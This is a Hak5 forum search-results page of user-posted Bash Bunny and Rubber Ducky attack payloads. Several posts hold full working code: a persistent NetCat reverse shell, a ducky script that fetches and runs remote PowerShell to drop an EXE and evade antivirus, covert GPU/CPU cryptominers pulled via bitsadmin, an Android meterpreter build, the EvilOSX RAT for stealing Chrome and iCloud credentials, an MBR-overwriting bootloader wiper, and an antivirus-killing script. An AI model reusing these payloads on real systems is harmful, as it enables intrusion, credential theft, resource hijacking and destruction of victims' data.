Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'payload'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 48 results

  1. Hi there, I was wondering how the powershell based bunny payloads that load powershell-script-files from either the smb or the webservice of the bunny could circumvent the system wide proxy. The problem is that the proxy - obviously - is unable to connect to the bunny-IP and the payload fails. The current versions of the payloads does not seem to take this into account. The expected behaviour should be to ignore the system proxy during the initial request to the bunny and to use it in all other requests which is powershell default. I am currently unaware of a good solution to circumvent a system wide proxy in powershell, especially without local admin. Any ideas? Best regards! F
  2. Windows Persistent Reverse Shell for Bash Bunny Author: 0dyss3us (KeenanV) Version: 1.0 Description Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker. Targets Windows 10 (working on support for older versions) Connection can be closed and reconnected at any time Deploys in roughly 15-20 sec Works with NetCat Requirements Have a working Bash Bunny :) STATUS LED STATUS Purple Setup Amber (Single Blink) Installing and running scripts Green Finished Installation and Execution Plug in Bash Bunny in arming mode Move files from WindowsPersistentReverseShell to either switch folder Edit the persistence.vbs file and replace ATTACKER_IP with attacker's IP and PORT with whichever port you like to use (I use 1337 😉) Save the persistence.vbs file Unplug Bash Bunny and switch it to the position the payload is loaded on Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec) Unplug the Bash Bunny and go to attacker's machine Listen on the port you chose in the persistence.vbs file on NetCat Run the command nc -nlvp 1337 (replace the port with the port in persistence.vbs) If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command ncat instead of nc from the directory that you installed ncat.exe. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute) Once a Windows cmd prompt appears...YOU'RE DONE!! 😃 and you can disconnect and reconnect at any time as long as the user is logged in Download Click here to download
  3. Hey all, first post here! I am working on a payload that, when connected to an unlocked Android device, will open the Gmail, attach a number of files, and then send the email. I am having issues with opening the "attach files" menu (the paperclip icon) because I cannot seem to see a way to get the keyboard to tab over to it. Here is what I have so far, tested on a Pixel XL, latest version, with a HP USB Keyboard. Windows + G > Opens Gmail CTRL + N > Create new email someone@domain.com > Enter in the desired destination email. ENTER > Confirms the email address you entered TAB TAB > Moves cursor to Subject Line > Add an email subject. TAB > Moves cursor to body. Text. > Add text to body. Magic happens? This is where I cannot click the paperclip icon, but if I do it on the touch screen, I can finish it out with the keyboard... SHIFT + DOWN ARROW > Selects file(s). SHIFT + ENTER > Attaches files. CTRL + ENTER > Send the email. Any help or thoughts would be greatly appreciated! Cheers!
  4. Hello peeps! So i was thinking yesterday, cant we skip all that long-taking payload typing to get a reverse shell? Here is where i thought of pastebin and wget to bat! It's really simple and just an upgrade. DELAY 500 GUI R DELAY 500 STRING powershell ENTER DELAY 1500 LEFTARROW DELAY 100 ENTER DELAY 2000 ALT TAB DELAY 100 STRING cd %temp% ENTER STRING <the pastebin raw> -UseBasicParsing -OutFile pay.bat ENTER DELAY 100 STRING ./pay.bat ENTER The pastebin raw would look like this powershell -nop -wind hidden -noni -enc <your encoded metasploit payload> NP. -BrianNovius
  5. "Payload group"

    Hello everyone, I am looking for some people to work together as a group and make some payloads, I've made a GitHub group and I'm on an IRC server links below. Payloads will vary so not very specific yet. Looking forward to it. Github: https://github.com/CIPH3R0/C1PH3R IRC: irc.xertion.org #C1PH3R C1PH3R "Don't look at the branch of the problem, look at the ROOT(C1PH3R)"
  6. How does it work / what is it? I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky! This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. Tutorial: First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime. Script for website: The code on my website looks something like this... Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" $arr = (Get-Item -Path $path).Property $url = "www.linkToEndPayload" $output = "$env:temp/test.zip"; $out = "$env:temp/Remake.txt"; Remove-Item -Path $output Invoke-WebRequest -Uri $url -OutFile $output Unzip $output "$env:temp/" Rename-Item -Path $out -NewName "Remake.exe" Start-Process -FilePath "$env:temp/Remake.exe" foreach($item in $arr) { if($item -ne "MRUList") { Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue } } This code downloads the .EXE payload (Which is stored in a .ZIP file.) We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates. Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this... Script for ducky: DELAY 500 GUI r DELAY 100 STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a ENTER That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection. PS: I'm not very good at PowerShell Scripting
  7. This thread is just to talk about the possibilities of PrivateLocker on BashBunny.. PrivateLocker encrypts all files in your Personal Locker (made by the Program) and writes a Unique key in a Directory in the local directory of the Program. I don't know if anyone would be interested in a Payload consisting of a "Paid" program instead of a Open-Source Program. Only issue I could think of this Payload would be trying to figure out the transfer of the keys since all keys are written to a local directory of the EXE. (and coming up with the $$ for the Encryption Tool) Any Ideas?
  8. How to get Police LED

    Hi how do i get the police led sequence from the update flashes I want to implement this sequence into my payload, whats the code I need to write to get the sequence and how do I change the colours and the timing. Changing the colours and timing is just changing values but I don,t know how to recreate the police lighting. Thanks
  9. I have been troubleshooting issues with the bashbunny for as long as it has been available. I got mine as soon as it was released; and it has been nothing but problematic from day one; which is a shame. The device, in theory, is probably the best thing Hak5 has ever come out with; but it practice, it has been the least usable in my experience. Many payloads will not run consistently; if they run properly at all. Every payload that makes use of the USB partition (the one thing that should really allow us to accomplish truly amazing feats) is problematic for many of its customers. The bashbunny forum is littered with threads full of people who cannot get any credential payloads to work because USB writing fails; among other problems. Simple ducky payloads that execute fine on the ducky or on nethunter's duckhunter will not inject properly a fair percentage of the time on the bashbunny. I see mixed character case issues where they shouldn't be and other anomalies. I am really hoping the USB corruption issues and the bizarre injection problems I am having is due solely to the fact that I adopted so early and the rest of the devices are not plagued with these issues; as they make the device unusable. I am pleading with Hak5 support here to please provide me with a replacement. I and my friends have poured countless hours of time and ulcers into trying to get this device to work; with, very little and, no lasting success. Anything we get to to work once or twice is quickly broken by yet another USB corruption issue or other strange injection anomaly. Please help me. I have gone through every unbricking, reflashing, updating, and udisk reformatting operation that support has given and have tried every firmware available. Nothing seems to be able to salvage this bunny. Help me technolust-ken-obee. You're my only hope...
  10. JackRabbit payload

    Has anyone had any success with the jackrabbit payload? It seems to be exactly what I'm looking for; except it's not working at all. It creates the sub-folder for the target in the loot directory; but it doesn't put any data in the folder. Also, it leaves many of its powershell windows open with all of the bashbunny code just sitting there out in the open. It doesn't eject properly either. So, it's not closing its windows, writing any of the target info to the loot folder, or ejecting properly.
  11. I came up with the idea to "misuse" the LED colors (8 payload possiblilties) as payload indicator. This allows to use switch position 2 to select the payload (it copies the payload content to switch1) and make your selection with moving the switch to position 1. Pluggin in the stick with position 1 will execute your payload and indicate the payload color for 1 sec. The project is hosted on Github: https://github.com/H8to/HoppEye Strange to explain, but cool if you get the hang of it. Folder structure looks like the following: payloads/ payload_B_BluePayload/ payload_G_Green/ payload_OFF_empty/ payload_W_network/ payload_C_empty/ payload_M_PoisonBunnyTap/ payload_R_ReverseShellEmpire/ payload_Y_empty/ switch1/ switch2/ payload.txt <-- This is where the magic happens Please see the Github for further info.
  12. Nmaper Payload

    Hi all would everyone be able to test my payload before I push it. It is based Darren's nmaper for the bash bunny. Thanks.
  13. Hello guys I will hear about if it was possible to connect packet squirrel between Router and Switch and have computers on connected and than let the Packet squirrel run a payload that spreads to theres computers there connected to the switch and then Connect to theres computers and later connect to them on lan by the payload there are on ? Greetings
  14. I-C-U GPU Miner By Ar1k88 As a Celebration for Firmware 1.4, I am releasing the 2nd part of the Cryptocurrency Mining scripts I have laying around. This Nifty lil script will Detect if a "desired" Graphics Card is installed, and downloads the correct miner depending on manufacturer. If not, it displays a Custom Error Message letting you know that there is "No Supported GPU". (Once again I took out a bit of this code due to the way I 1st coded it.) Enjoy! -Ar1k88 Payload.txt #!/bin/bash # # ------------------------------------------------------------------- # Title: I-C-U-GPU # Author: Ar1k88 # Verison: 2.1e # Target: Windows 7-10 # Category: Exploitation/Resources # # Notes: # ------------------------------------------------------------------- # I dont know why I code these things, but it works. You'll need to # host your own AMD/NVIDIA Miners on a Direct Download Link. (If you # dont know what that is, Google it.) I based this off Claymore's GPU # Miner and Tpruvot's ccminer. All downloads can be found by searching # the web and githubs. # # Here we go. # -Ar1k88 # ------------------------------------------------------------------- # Start the Attack! LED ATTACK # Setting to proper Attackmode. ATTACKMODE HID STORAGE RUN WIN powershell ".((GWMI win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.cmd')" # Give Miner 10 seconds to Download. Q DELAY 10000 LED FINISH 1.cmd (Where the real work goes on.) @echo off REM ------------------------------------------------------------------- REM Script: I-C-U-GPU REM Platform: Windows 7-10 REM Author: Ar1k88 REM REM Notes: REM ------------------------------------------------------------------- REM I dont know why I code these things, but it works. You'll need to REM host your own AMD/NVIDIA Miners on a Direct Download Link. (If you REM dont know what that is, Google it.) I based this off Claymore's GPU REM Miner and Tpruvot's ccminer. All downloads can be found by searching REM the web and githubs. REM REM Here we go. REM -Ar1k88 REM ------------------------------------------------------------------- REM -------------------- REM - Scan for Troops! - REM -------------------- REM Enabling extensions to help with variables in script. SETLOCAL ENABLEEXTENSIONS REM Clearing screen to start the script. cls REM Running Custom GPU detection script. 2-Part :DETECT REM PART 1 - Print local Video Controllers Model Number into a local file. for /F "tokens=* skip=1" %%n in ('WMIC path Win32_VideoController get Name ^| findstr "."') do set GPU_NAME=%%n REM Print to a local file in the scripts current directory. echo %GPU_NAME% > %~dp0\info.txt REM PART 2 - Check for Certain Types of GPU's. REM Check for NVIDIA GPU. :DETECT1 >nul find "NVIDIA GeForce" %~dp0\info.txt && ( GOTO FOUNDN ) || ( GOTO DETECT2 ) REM Check for AMD GPU. :DETECT2 >nul find "Radeon RX" %~dp0\info.txt && ( GOTO FOUNDA ) || ( GOTO NOTFOUND ) REM if not found, Display prompt and Exit. :NOTFOUND echo No Supported GPU was found. REM Remove next line to just print into the console. msg * "No Supported GPU was found." pause >NUL exit /b REM ------------------- REM - Start the Army! - REM ------------------- REM If NVIDIA GPU is Found. :FOUNDN REM Printing GPU Info into the Console. echo GPU Found: type %~dp0\info.txt del /f %~dp0\info.txt >NUL REM Downloading NVIDIA Miner. REM -- Insert your Direct Download link below in the URL bitsadmin pulls from. -- bitsadmin.exe /transfer "Windows Service" https://s02.solidfilesusercontent.com/MzU0MTE3ZjZmNzFjNjRjNzA0ZTQwOWEzMGE0MzRlNzNiZWJjOGYzYjoxZTY1em46TXktX3QyczlZcHB3Y2tnem5Rd2wxblhiV3lz/6PGnXWWLYxd6j/ccminer.zip %APPDATA%\miner.zip >NUL echo Done downloading, Continuing Script. REM Unzipping Miner. cd %~dp0 REM Create on-the-go Unzip Script screw 7zip, make Windows do it. -Ar1k88 @echo ZipFile="%APPDATA%\miner.zip">decomp.vbs @echo ExtractTo="%APPDATA%">>decomp.vbs @echo. >>decomp.vbs @echo Set fso = CreateObject("Scripting.FileSystemObject")>>decomp.vbs @echo sourceFile = fso.GetAbsolutePathName(ZipFile)>>decomp.vbs @echo destFolder = fso.GetAbsolutePathName(ExtractTo)>>decomp.vbs @echo. >>decomp.vbs @echo Set objShell = CreateObject("Shell.Application")>>decomp.vbs @echo Set FilesInZip=objShell.NameSpace(sourceFile).Items()>>decomp.vbs @echo objShell.NameSpace(destFolder).copyHere FilesInZip, 16>>decomp.vbs @echo. >>decomp.vbs @echo Set fso = Nothing>>decomp.vbs @echo Set objShell = Nothing>>decomp.vbs @echo Set FilesInZip = Nothing>>decomp.vbs REM Decompressing zip folder to %APPDATA% call %~dp0\decomp.vbs REM Cleaning Up. del /f %~dp0\decomp.vbs del /f %APPDATA%\miner.zip REM Cleaned up, Run the Miner. if EXIST "%APPDATA%\miner\" RMDIR "%APPDATA%\miner" /S /Q REM Change the folder names to correspond to the correct miner for NVIDIA. if NOT EXIST "%APPDATA%\miner" mkdir "%APPDATA%\miner" && copy "%APPDATA%\ccminer" "%APPDATA%\miner\" >NUL RMDIR "%APPDATA%\ccminer" /S /Q cd "%APPDATA%\miner" REM Change this to the EXE and arguements of the Miner you chose for NVIDIA. %APPDATA%\miner\ccminer.exe -a cryptonight -o stratum+tcp://mgcloudhost.com:5555 -u 10 -p x REM Go to the End Script. GOTO END REM If AMD GPU is found. :FOUNDA REM Printing GPU Info into the Console. echo GPU Found: type %~dp0\info.txt del /f %~dp0\info.txt >NUL REM Downloading AMD Miner REM -- Insert your Direct Download link below in the URL bitsadmin pulls from. -- echo Downloading.. Please Wait.. bitsadmin.exe /transfer "Windows Service" https://s01.solidfilesusercontent.com/Zjc5NmYwZGU4ZDI3MGU2NTAxNjY4OTZmN2UyMDhhNGM5ZGRiY2RiYjoxZTY0aGU6c05qcWstMnRXM1JtUVk5a2NaSFJPNExqc1RN/KvnZGBAvne6MV/Claymore_CryptoNote_GPU_Miner_v9.7_Beta_-_POOL_Catalyst_15.12_%281%29.zip "%APPDATA%\miner.zip" >NUL echo Done downloading, Continuing Script. REM Unzipping Miner cd %~dp0 REM Create on-the-go Unzip Script screw 7zip, make Windows do it. -Ar1k88 @echo ZipFile="%APPDATA%\miner.zip">decomp.vbs @echo ExtractTo="%APPDATA%">>decomp.vbs @echo. >>decomp.vbs @echo Set fso = CreateObject("Scripting.FileSystemObject")>>decomp.vbs @echo sourceFile = fso.GetAbsolutePathName(ZipFile)>>decomp.vbs @echo destFolder = fso.GetAbsolutePathName(ExtractTo)>>decomp.vbs @echo. >>decomp.vbs @echo Set objShell = CreateObject("Shell.Application")>>decomp.vbs @echo Set FilesInZip=objShell.NameSpace(sourceFile).Items()>>decomp.vbs @echo objShell.NameSpace(destFolder).copyHere FilesInZip, 16>>decomp.vbs @echo. >>decomp.vbs @echo Set fso = Nothing>>decomp.vbs @echo Set objShell = Nothing>>decomp.vbs @echo Set FilesInZip = Nothing>>decomp.vbs REM Decompressing zip folder to %APPDATA% call %~dp0\decomp.vbs REM Cleaning up. del /f %~dp0\decomp.vbs del /f %APPDATA%\miner.zip REM Cleaned up, Run the Miner. if EXIST "%APPDATA%\miner\" RMDIR "%APPDATA%\miner" /S /Q REM Change the folder names to correspond to the correct miner for AMD. if NOT EXIST "%APPDATA%\miner" mkdir "%APPDATA%\miner" && copy "%APPDATA%\Claymore CryptoNote GPU Miner v9.7 Beta - POOL" "%APPDATA%\miner\" >NUL RMDIR "%APPDATA%\Claymore CryptoNote GPU Miner v9.7 Beta - POOL" /S /Q cd "%APPDATA%\miner" REM Change this to the EXE and arguements of the Miner you chose for AMD. %APPDATA%\miner\NsGpuCNMiner.exe -o stratum+tcp://mgcloudhost.com:5555 -u 10 -p x REM Go to the End Script. GOTO END REM End Script. You can choose to clean up the folder, and exit. - or just exit. :END REM Uncomment next line to remove Miner folder after mining is done. REM RMDIR "%APPDATA%\miner" /S /Q REM Exiting script. exit /b Enjoy! -Ar1k88 https://twitter.com/ar1k88
  15. I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost lhost => msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on msf exploit(handler) > [*] Sending stage (69089 bytes) to [*] Meterpreter session 1 opened ( -> at 2017-10-19 23:02:02 +0700
  16. [PAYLOAD] RevShellBack

    Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So.. why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has done executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo: Write file (with content) to the desktop Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible Open calculator application Message box -- powered by PowerShell For information about the payload, the payload script itself and how to configure it, it can be found at this GitHub repository: https://github.com/NodePoint/RevShellBack
  17. [PAYLOAD] BunnyMiner

    BunnyMiner By Ar1k88 I'm going to "quietly" sneak this onto the thread... **** PLEASE DO NOT USE THIS ON OTHER PEOPLE'S PC'S! MYSELF, & MINERGATE DO NOT ENCOURAGE SUCH USE! **** Anyways, this is just a Simple CPU Miner from my Collection of Odd Scripts. And figured since this place doesn't cover this topic, I would try to do it myself. This is a SMALL NON-Silent CPU Miner, yes it can be made to be silent. The whole object of this post would be for demonstration purposes. I'll just post it and see what happens. :) payload.txt #!/bin/bash # # Title: USB CPU Miner # Author: Ar1k88 # Version: 1.1g # Target: Windows 7-10 # Category: Exploiting Resources # Sub-Category: Cryptocurrency # # I'm not promoting here. BUT since I do work for MinerGate (a HUGE Cryptocurrency Mining Pool) I am releasing # a Simple Non-Silent CPU Miner. Just to show that it is possible to mine Digital Currency with a USB. # # Please change the credentials in "config.txt" to this format: # <algorithim> # <pool stratum> # <username/wallet> # <cores/threads> # # Keep in mind this is just a Simple CPU Miner. I will leave the code here. You will need to go to # https://github.com/tpruvot/cpuminer-multi/releases/download/v1.3-multi/cpuminer-multi-rel1.3.zip # Extract the EXE's and use the x86 (32Bit) version due to it supports both 32Bit and 64Bit CPU # architectures. Add "cpuminer-x86.exe" and "msvcr120.dll" to the payload folder, and rename it to "2.exe". # Enjoy! -Ar1k88 # Grace-period for PC to recognize the BashBunny. Q DELAY 300 # Setting up and Attacking! CHARRRRGGGEEE!!! LED ATTACK # NOTE: Setting to Read-Only Storage to prevent Anti-virus's from removing binary files. (EXE's) ATTACKMODE HID RO_STORAGE RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.cmd')" LED FINISH 1.cmd @echo Off cls REM This is to set easy to edit files for new users. Anyone who used a Console Miner would know what this is. REM -Ar1k88 SetLocal EnableDelayedExpansion Set n= Set ConfigFile=%~dp0\config.txt For /F "tokens=*" %%I IN (%ConfigFile%) DO ( Set /a n+=1 Set var!n!=%%I ) echo %var3% call %~dp0\2.exe -a %var1% -o %var2% -u %var3% -p x -t %var4% pause EndLocal @exit /B Config.txt is set up as following: <algorithm> <stratum> <email/wallet> <threads/cores> config.txt cryptonight stratum+tcp://aeon.pool.minergate.com:45550 demoemailaddress@email.com 2 Enjoy! P.S. - If you want to sign up to show this off to your friends or for work. Can easily create a account at MinerGate. http://bit.ly/MinerGateSignUp https://twitter.com/ar1k88 -Ar1k88
  18. Payload Basics. Question

    Please bare with me this is a very nube question. In bash bunny. Lets say in payload - Switch1 - payload.txt What would be the syntax to run another payload.txt say from " payloads/library/test/payload.txt " So payload/switch1/payload.txt would execute and run payloads/library/test/payload.txt " Thanks in advance, I know it's a very basic question..
  19. [PAYLOAD] untitled_EVILOSX

    Please check git for the latest README/code https://github.com/stekole/bashbunny-payloads/tree/master/payloads/library/remote_access/untitled_EVILOSX untitled_EVILOSX + ______ _ _ ____ _____ __ __ + | ____| (_)| | / __ \ / ____|\ \ / / + | |__ __ __ _ | || | | || (___ \ V / + | __|\ \ / /| || || | | | \___ \ > < + | |____\ V / | || || |__| | ____) | / . \ + |______|\_/ |_||_| \____/ |_____/ /_/ \_\\ + untitled_ bash bunny edition / stekole ** Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. ** ** Accessing a computer system or network without authorization or explicit permission is illegal. ** Features Client reconnects automatically/persistence ECM_ETHERNET and HID attack Emulate a simple terminal instance. Sockets are encrypted with CSR via OpenSSL. No dependencies (pure python). Retrieve Chrome passwords. Retrieve iCloud contacts. Attempt to get iCloud password via phishing. Show local iOS backups. Download and upload files. Retrieve find my iphone devices. Attempt to get root via local privilege escalation (<= 10.10.5). Auto installer Configuration Server To prep your server you will need to download and follow the install instructions from EVILOSX. On your server, download the EvilOSX code and run your server. git clone https://github.com/Marten4n6/EvilOSX.git && cd EvilOSX ./Server and type your listening port (1337) Client Before you deploy your bash bunny, update your configuration in the EvilOSX.py file At the bottom of the file you will see a server and port variable Set these to your server IP and listening port ######################### SERVER_HOST = "" SERVER_PORT = 1337 ######################### Usage Plug in your bash bunny and wait until the script has finished running. You should see the client connect to the server root@kali:~/git/EvilOSX# ./Server.py ______ _ _ ____ _____ __ __ | ____| (_)| | / __ \ / ____|\ \ / / | |__ __ __ _ | || | | || (___ \ V / | __|\ \ / /| || || | | | \___ \ > < | |____\ V / | || || |__| | ____) | / . \ |______|\_/ |_||_| \____/ |_____/ /_/ \_\ [?] Port to listen on: 1337 [I] Type "help" to get a list of available commands. > help help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. exit - Close the server and exit. > clients [I] 1 client(s) available: 0 = client_hostname > connect 0 [I] Connected to "client_hostname", ready to send commands. Some of the other features can be found in the help menu. I have not tried them all help - Show this help menu. status - Show debug information. clients - Show a list of clients. connect <ID> - Connect to the client. get_info - Show basic information about the client. get_root - Attempt to get root via local privilege escalation. download <path> - Downloads the file to the local machine. upload <path> - Uploads the file to the remote machine. chrome_passwords - Retrieve Chrome passwords. icloud_contacts - Retrieve iCloud contacts. icloud_phish - Attempt to get iCloud password via phishing. itunes_backups - Show the user's local iOS backups. find_my_iphone - Retrieve find my iphone devices. screenshot - Takes a screenshot of the client. kill_client - Brutally kill the client (removes the server). exit - Exits the session. Any other command will be executed on the connected client. Removal of Tool The python script gets added to users ~/Library/ directory - and startup file is added to the ~/Library/LaunchAgents directory rm -rf ~/Library/Containers/.EvilOSX/ launchctl unload ~/Library/LaunchAgents/com.apple.EvilOSX.plist && rm -rf ~/Library/LaunchAgents/com.apple.EvilOSX.plist Defence disable the command-space short key for spotlight or disable spotlight all together if not needed Todo Issues I ran into a few issues with the "Build" of the python script. If the default one in this payload doesnt work, regenerate a new EvilOSX.py Run ./BUILDER and enter the appropriate information: After, copy this to your switch payload Thanks @Marten4n6 [YOURMOM](Check my room)
  20. Very basics question

    I'm new to the bash bunny but have had the rubber ducky since the beginning. Very basic question, Which I guess I can test when I have some time. Since we now have a Payload folder outside of the switch payload. Can we inside the switch payload txt just point to another payload text thats in the Payload folder. Again I know this is probably a very basic question, However I didn't see any documentation anywhere. I would be nice to reference one or multiple other payloads from one script
  21. Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING) I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS. CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM 1. Download the precompiled boot.exe (source code is here if you want to compile yourself): #include <windows.h> #include <conio.h> #include <iostream> int main(int argc, char* argv[]){ DWORD dw; char *pathToBin = "boot.bin"; HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0); if (drive != INVALID_HANDLE_VALUE){ HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0); if (binary != INVALID_HANDLE_VALUE){ DWORD size = GetFileSize(binary, 0); if (size > 0){ byte *mbr = new byte[size]; if (ReadFile(binary, mbr, size, &dw, 0)){ std::cout << "Binary file successfuly read!" << std::endl; if (WriteFile(drive, mbr, size, &dw, 0)){ std::cout << "First sector overritten successfuly!" << std::endl; } else std::cerr << "Fatal error! Can't override 1st sector!" << std::endl; } else std::cerr << "Error reading from binary file!" << std::endl; } else std::cerr << "Invalid binary file!" << std::endl; } else{ std::cerr << "Can't find the binary file to read from!" << std::endl; } CloseHandle(binary); } else std::cerr << "Administrator privileges required!" << std::endl; CloseHandle(drive); return 0; } 2. Create Folder exec on your ducky sdcard and copy boot.exe into it. 3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin 4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY): REM I am NOT responsible for ANY DAMAGE REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr DELAY 5000 ESCAPE DELAY 500 CONTROL ESCAPE DELAY 500 STRING cmd DELAY 500 CTRL-SHIFT ENTER DELAY 1000 REM replace with desired uac alt + key kombo (y for yes in english , j for german etc) ALT y DELAY 1500 STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a ENTER DELAY 300 STRING cd exec ENTER DELAY 300 STRING boot.exe ENTER DELAY 1000 STRING exit ENTER I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier boot.exe
  22. [PAYLOAD] AVKill

    Eh, I haven't been too active in awhile due to work so I figured I'd post one from my collection. AVKill - BashBunny -Ar1k88 This script was based off the Metasploit ruby code of "avkill". I just rewrote it for BashBunny. Payload.txt #!/bin/bash # # Title: AVKill # Author: Ar1k88 # Version: 1.2.1 # Target: Windows 7-10 # # O===================O=================== # | Magenta | Setup # | Yellow | Excuting Script # | Green/Success | Script Completed # | Cyan | Cleaning Up/ # | | | Shutting down # | OFF | Ready for Removal # O======================================= # # This is based off of avkill.rb from metasploit framework, I managed to just take the processes out, # and convert them to both .cmd format AND .ps1 format. So pick your poison guys. Have fun! # -Ar1k88 # Setup BashBunny LED M SOLID source bunny_helpers.sh Q DELAY 5000 # Set BashBunny and Execute AVKill ATTACKMODE HID STORAGE LED Y VERYFAST Q GUI r Q DELAY 1000 Q STRING powershell -executionpolicy bypass -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\start.cmd')" Q ENTER LED SUCCESS Q DELAY 30000 # Starting syncing and shutdown sync -o LED C VERYFAST Q DELAY 3000 # Shutdown Command for BashBunny LED C SOLID shutdown 0 AVKill.ps1 Stop-Process -ProcessName AAWTray.exe -Force Stop-Process -ProcessName Ad-Aware.exe -Force Stop-Process -ProcessName MSASCui.exe -Force Stop-Process -ProcessName _avp32.exe -Force Stop-Process -ProcessName _avpcc.exe -Force Stop-Process -ProcessName _avpm.exe -Force Stop-Process -ProcessName aAvgApi.exe -Force Stop-Process -ProcessName ackwin32.exe -Force Stop-Process -ProcessName adaware.exe -Force Stop-Process -ProcessName advxdwin.exe -Force Stop-Process -ProcessName agentsvr.exe -Force Stop-Process -ProcessName agentw.exe -Force Stop-Process -ProcessName alertsvc.exe -Force Stop-Process -ProcessName alevir.exe -Force Stop-Process -ProcessName alogserv.exe -Force Stop-Process -ProcessName amon9x.exe -Force Stop-Process -ProcessName anti-trojan.exe -Force Stop-Process -ProcessName antivirus.exe -Force Stop-Process -ProcessName ants.exe -Force Stop-Process -ProcessName apimonitor.exe -Force Stop-Process -ProcessName aplica32.exe -Force Stop-Process -ProcessName apvxdwin.exe -Force Stop-Process -ProcessName arr.exe -Force Stop-Process -ProcessName atcon.exe -Force Stop-Process -ProcessName atguard.exe -Force Stop-Process -ProcessName atro55en.exe -Force Stop-Process -ProcessName atupdater.exe -Force Stop-Process -ProcessName atwatch.exe -Force Stop-Process -ProcessName au.exe -Force Stop-Process -ProcessName aupdate.exe -Force Stop-Process -ProcessName auto-protect.nav80try.exe -Force Stop-Process -ProcessName autodown.exe -Force Stop-Process -ProcessName autotrace.exe -Force Stop-Process -ProcessName autoupdate.exe -Force Stop-Process -ProcessName avconsol.exe -Force Stop-Process -ProcessName ave32.exe -Force Stop-Process -ProcessName avgcc32.exe -Force Stop-Process -ProcessName avgctrl.exe -Force Stop-Process -ProcessName avgemc.exe -Force Stop-Process -ProcessName avgnt.exe -Force Stop-Process -ProcessName 